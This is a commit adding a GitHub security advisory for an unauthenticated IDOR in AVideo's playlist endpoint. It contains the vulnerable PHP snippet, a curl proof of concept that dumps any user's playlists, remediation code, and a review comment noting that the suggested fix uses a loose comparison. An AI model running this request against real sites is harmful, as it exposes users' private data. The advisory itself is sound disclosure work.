
Commit 519b3c0

1 parent 92c6470 commit 519b3c0


1 file changed

+60
-0
lines changed

Lines changed: 60 additions & 0 deletions
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-6w2r-cfpc-23r5",
4+
"modified": "2026-03-07T02:25:48Z",
5+
"published": "2026-03-07T02:25:48Z",
6+
"aliases": [],
7+
"summary": "AVideo has Unauthenticated IDOR - Playlist Information Disclosure",
8+
"details": "**Product:** AVideo (https://github.com/WWBN/AVideo)\n**Version:** Latest (tested March 2026)\n**Type:** Insecure Direct Object Reference (IDOR)\n**Auth Required:** No\n**User Interaction:** None\n\n## Summary\n\nThe `/objects/playlistsFromUser.json.php` endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform.\n\n## Root Cause\n\nThe endpoint accepts a `users_id` parameter and directly queries the database without any authentication or authorization check.\n**File:** `objects/playlistsFromUser.json.php`\n\n```php\nif (empty($_GET['users_id'])) {\n die(\"You need a user\");\n}\n// NO AUTHENTICATION CHECK\n// NO AUTHORIZATION CHECK (does this user_id belong to the requester?)\n$row = PlayList::getAllFromUser($_GET['users_id'], false);\necho json_encode($row);\n```\n\nThere is no call to `User::isLogged()` or any comparison between the requesting user and the target `users_id`.\n\n## Affected Code\n\n| File | Line | Issue |\n|------|------|-------|\n| `objects/playlistsFromUser.json.php` | 10-21 | No authentication or authorization check before returning playlist data |\n\n## Proof of Concept\n\n### Retrieve admin's playlists (user ID 1)\n\n```bash\ncurl \"https://TARGET/objects/playlistsFromUser.json.php?users_id=1\"\n```\n\n**Response:**\n```json\n[\n {\"id\":false,\"name\":\"Watch Later\",\"status\":\"watch_later\",\"users_id\":1},\n {\"id\":false,\"name\":\"Favorite\",\"status\":\"favorite\",\"users_id\":1}\n]\n```\n\n<img width=\"1805\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a13c9c2f-29be-4399-98d2-7570ca30465a\" />\n\n\n## Impact\n\n- **Privacy violation** — any visitor can see all users' playlist names and contents\n- **User enumeration** — valid user IDs can be discovered by iterating through IDs\n- 
**Information gathering** — playlist names and video IDs reveal user interests and private content preferences\n- **Targeted attacks** — gathered information can be used for social engineering or further exploitation\n\n## Remediation\n\nAdd authentication and authorization checks:\n\n```php\n// Option 1: Require authentication + only own playlists\nif (!User::isLogged()) {\n die(json_encode(['error' => 'Authentication required']));\n}\nif ($_GET['users_id'] != User::getId() && !User::isAdmin()) {\n die(json_encode(['error' => 'Access denied']));\n}\n\n// Option 2: If public playlists are intended, filter by visibility\n$row = PlayList::getAllFromUser($_GET['users_id'], false, 'public');\n```",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Packagist",
19+
"name": "wwbn/avideo"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "25.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6w2r-cfpc-23r5"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/WWBN/AVideo/commit/12adc66913724736937a61130ae2779c299445ca"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/WWBN/AVideo"
48+
}
49+
],
50+
"database_specific": {
51+
"cwe_ids": [
52+
"CWE-306",
53+
"CWE-862"
54+
],
55+
"severity": "MODERATE",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-07T02:25:48Z",
58+
"nvd_published_at": null
59+
}
60+
}
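Review bot: the remediation snippet embedded in `details` (Option 1) performs the ownership check with a loose comparison on the raw query parameter, `if ($_GET['users_id'] != User::getId() && !User::isAdmin())`, so PHP's string-to-int juggling rather than an explicit type decides whether the caller owns the playlist; cast first, e.g. `(int) $_GET['users_id'] !== (int) User::getId()`, and pass the same cast value to `PlayList::getAllFromUser()` instead of `$_GET['users_id']`. Two smaller points on the same field: Option 2 calls `PlayList::getAllFromUser($_GET['users_id'], false, 'public')` with a third visibility argument that the root-cause snippet (two arguments) does not show, so confirm that parameter exists before publishing it as a fix; and the `affected` range declares `"fixed": "25.0"` while the narrative only states `Version: Latest (tested March 2026)`, so the advisory should state that 25.0 is the first release containing the referenced fix commit `12adc66913724736937a61130ae2779c299445ca`, or leave the fixed event out until that is verified.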
